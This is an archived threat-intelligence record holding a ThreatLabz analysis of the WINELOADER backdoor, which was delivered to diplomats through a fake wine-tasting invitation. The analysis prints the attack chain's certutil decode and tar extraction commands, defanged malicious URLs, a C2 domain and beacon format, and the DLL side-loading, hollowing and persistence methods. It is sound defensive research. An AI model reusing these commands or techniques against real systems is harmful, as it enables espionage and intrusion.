{
	"id": "eaf32baa-4493-4747-a7fb-379de0f282cb",
	"created_at": "2026-04-06T00:09:18.595751Z",
	"updated_at": "2026-04-10T03:33:24.022124Z",
	"deleted_at": null,
	"sha1_hash": "cef401381247501890cedb23e9107a08ce1a9509",
	"title": "WINELOADER Analysis | ThreatLabz",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1313839,
	"plain_text": "WINELOADER Analysis | ThreatLabz\r\nBy Sudeep Singh, Roy Tay\r\nPublished: 2024-02-27 · Archived: 2026-04-05 13:53:51 UTC\r\nTechnical Analysis\r\nIn this section, we provide a detailed analysis of each component of the attack chain initiated when a victim receives and clicks on the link within the PDF.\r\nPDF analysis\r\nThe PDF file is a fake invitation to a wine-tasting event purported to take place at the Indian ambassador’s residence on February 2nd, 2024. The contents are well-crafted to impersonate the Ambassador of India. The invitation contains a link to a fake questionnaire, which kickstarts the infection chain.\r\nThe malicious link in the PDF invitation redirects users to a compromised site, hxxps://seeceafcleaners[.]co[.]uk/wine.php, that proceeds to download a ZIP archive containing an HTA file - wine.hta.\r\nFigure 2 below shows the contents of the PDF file.\r\nhttps://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader\r\nPage 1 of 8\n\nFigure 2: The PDF invitation showcasing the malicious link.\r\nA quick analysis of the PDF file's metadata reveals that it was generated using LibreOffice version 6.4, and the time of creation was January 29th, 2024, at 10:38 AM UTC.\r\nHTA file analysis\r\nThe HTA file downloaded in the previous section contains obfuscated JavaScript code, which executes the next stage of malicious activities. The obfuscation technique used in the code exhibits patterns that match those of the publicly available obfuscator obfuscator.io.\r\nFigure 3 below shows a preview of the code inside the HTA file. Decoy content is displayed to the victim to disguise malicious activity. This content is similar to what was displayed in the original PDF (Figure 2 above) and includes information about the wine-tasting event in February 2024.\r\nFigure 3: Obfuscated JavaScript code inside the HTA file.\r\nThe HTA file performs the following key functions:\r\n- Downloads a Base64 encoded text file from the URL: seeceafcleaners[.]co[.]uk/cert.php\r\n- Saves the text file to the path: C:\\Windows\\Tasks\\text.txt\r\n- Uses certutil.exe to Base64 decode the text file and write the result to a ZIP archive with the path: C:\\Windows\\Tasks\\text.zip. The command used is: certutil -decode C:\\Windows\\Tasks\\text.txt C:\\Windows\\\\Tasks\\text.zip\r\n- Extracts the contents of the ZIP archive to the path: C:\\Windows\\Tasks\\. The command used is: tar -xf C:\\Windows\\Tasks\\text.zip -C C:\\Windows\\Tasks\\. The ZIP archive contains two files named sqlwriter.exe and vcruntime140.dll. Here, sqlwriter.exe is the legitimate binary signed by Microsoft and vcruntime140.dll is the malicious DLL crafted by the attacker, which will be side-loaded automatically when sqlwriter.exe is executed. Per our research, sqlwriter.exe has never been abused in-the-wild by any threat actor for DLL side-loading (at least to the best of our knowledge). This implies that the threat actor in this case put in extra effort to identify a signed Microsoft executable vulnerable to DLL side-loading.\r\n- Executes sqlwriter.exe from the path: C:\\Windows\\Tasks\\ which will kick-start the infection chain.\r\nWINELOADER binary analysis\r\nWhen sqlwriter.exe is executed, it loads a malicious DLL named vcruntime140.dll from the same directory via DLL side-loading. The exported function set_se_translator is then executed. This function decrypts the embedded WINELOADER core module within the DLL using a hardcoded 256-byte RC4 key before executing it. This is shown in the screenshot below.\r\nFigure 4: Code section that decrypts and executes the WINELOADER core module.\r\nEach module consists of configuration data (e.g., C2 polling interval), an RC4 key, and encrypted strings, followed by the module code. Part of the decrypted WINELOADER core module is shown in Figure 5 below.\r\nFigure 5: Data structure containing relevant configuration, RC4 key, encrypted strings, and the module.\r\nWINELOADER employs the following techniques to evade detection:\r\n- Sensitive data is encrypted with a hardcoded 256-byte RC4 key. The sensitive data includes:\r\n  - The core module and subsequent modules downloaded from the C2 server\r\n  - Strings (e.g. DLL filenames and API import function names)\r\n  - Data sent and received from the C2 server\r\n- Some strings are decrypted on use and re-encrypted shortly after.\r\n- Memory buffers for storing results from API calls or decrypted strings are zeroed after use.\r\nDLL hollowing is then used to inject WINELOADER into a randomly selected DLL from the Windows system directory. The implementation is similar to the one presented by SECFORCE in their blog. WINELOADER includes additional randomization code to ensure that different DLLs are chosen for each instance of DLL hollowing (see Figure 6).\r\nFigure 6: The randomization code used when selecting a Windows system DLL for DLL hollowing.\r\nWINELOADER is not injected into the following DLLs as they contain exported functions used by the malware:\r\n- advapi32.dll\r\n- api-ms-win-crt-math-l1-1-0.dll\r\n- api-ms-win-crt-stdio-l1-1-0.dll\r\n- bcryptprimitives.dll\r\n- iphlpapi.dll\r\n- kernel32.dll\r\n- kernelbase.dll\r\n- mscoree.dll\r\n- ntdll.dll\r\n- ole32.dll\r\n- rpcrt4.dll\r\n- shlwapi.dll\r\n- user32.dll\r\n- wininet.dll\r\nWINELOADER will inject itself into another randomly selected DLL again via DLL hollowing before it sends the first beacon request to the C2 server.\r\nThe beacon request is an HTTP GET request containing a request body, which is unusual for GET requests. All requests to the C2 server use the same User-Agent, Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.1) Gecko/20100101 Firefox/86.1, hardcoded into the sample itself.\r\nThe body of the HTTP GET request is encrypted with the same 256-byte RC4 key and the fields are as follows. We have appended a question mark to fields that we are unable to conclusively verify due to the limited data collected. This information is available in the table below.\r\nOffset | Length | Name | Description\r\n0x0 | 2 | Length of padding bytes (n) | This value is randomized (min: 255, max: 65535), stored in little-endian (LE).\r\n0x2 | n | Padding bytes | Padding bytes are randomly generated with the ProcessPrng API.\r\n0x2 + n | 8 | Campaign ID? | 5F D5 97 93 ED 26 CB 5A in the analyzed sample.\r\n0xa + n | 8 | Session ID? | Randomly generated on execution.\r\n0x12 + n | 8 | Local IP address | The local IP address of the infected machine.\r\n0x20 + n | 512 | Parent process name | In Unicode\r\n0x220 + n | 512 | User name | In Unicode\r\n0x420 + n | 30 | Machine name | In Unicode\r\n0x43e + n | 4 | Parent process ID | In little-endian\r\n0x442 + n | 1 | Parent process token elevation type | Information about the privileges of the token linked to the parent process.\r\n0x443 + n | 8 | Polling interval for C2 requests | C0 d4 01 00 00 00 00 00 in the analyzed sample, translates to 120,000 ms or 2 mins between requests.\r\n0x44b + n | 1 | Request type? | 1 for beacon, 2 for status update\r\n0x44c + n | 8 | Length of message | In little-endian. 0 for beacon requests\r\n0x454 + n | 8 | Unknown? | Observed to match the value of the request type field.\r\n0x45c + n | 8 | Module ID? | 00 00 00 00 00 00 00 for the core module and 6B 19 A8 D2 69 2E 85 64 for the persistence module.\r\n0x464 + n | Varies | Message | Only observed for type 2 requests.\r\nTable 1: WINELOADER C2 beacon request fields\r\nAn example beacon request is shown below. The value of the Content-Length header varies across requests, as the padding length is randomized with a minimum of 1,381 bytes.\r\nGET /api.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.1) Gecko/20100101 Firefox/86.1\r\nHost: castechtools.com\r\nContent-Length: 54674\r\n54,674 bytes of binary data in the request body (not shown here)\r\nThe same RC4 key is then used to decrypt the response from the C2 server. The fields for the decrypted response are shown in the table below.\r\nOffset | Length | Name | Description\r\n0x0 | 2 | Length of padding bytes (n) | This value is stored in little-endian (LE).\r\n0x2 | n | Padding bytes | Unused bytes\r\n0x2 + n | 8 | Campaign ID? | 5F D5 97 93 ED 26 CB 5A in the analyzed sample\r\n0xa + n | 1 | Command | Command from C2\r\n0xb + n | Varies | Command data | Binary data for command\r\nTable 2: WINELOADER C2 response fields\r\nThe core module supports three commands:\r\n1. Execute modules from the C2 either synchronously or asynchronously (via CreateThread)\r\n2. Inject itself into another DLL\r\n3. Update the sleep interval between beacon requests\r\nDuring our research, we obtained a persistence module from the C2 server. This module copies sqlwriter.exe and vcruntime.dll into the C:\\Windows\\Tasks directory and creates a scheduled task named MS SQL Writer with the description SQL Server VSS Writer 64-bit to execute C:\\Windows\\Tasks\\sqlwriter.exe daily.\r\nThe persistence module offers an alternative configuration to establish registry persistence at HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\MS SQL Writer.\r\nAfter establishing persistence for WINELOADER, the module sends an HTTP POST request to notify the C2 server about the completed task. The request body mirrors the structure of the beacon request.\r\nSource: https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader"
	],
	"report_names": [
		"european-diplomats-targeted-spikedwine-wineloader"
	],
	"threat_actors": [
		{
			"id": "d13753da-34f2-4057-ac40-69c729539dd7",
			"created_at": "2024-03-02T02:00:03.826505Z",
			"updated_at": "2026-04-10T02:00:03.596616Z",
			"deleted_at": null,
			"main_name": "SPIKEDWINE",
			"aliases": [],
			"source_name": "MISPGALAXY:SPIKEDWINE",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434158,
	"ts_updated_at": 1775792004,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cef401381247501890cedb23e9107a08ce1a9509.pdf",
		"text": "https://archive.orkl.eu/cef401381247501890cedb23e9107a08ce1a9509.txt",
		"img": "https://archive.orkl.eu/cef401381247501890cedb23e9107a08ce1a9509.jpg"
	}
}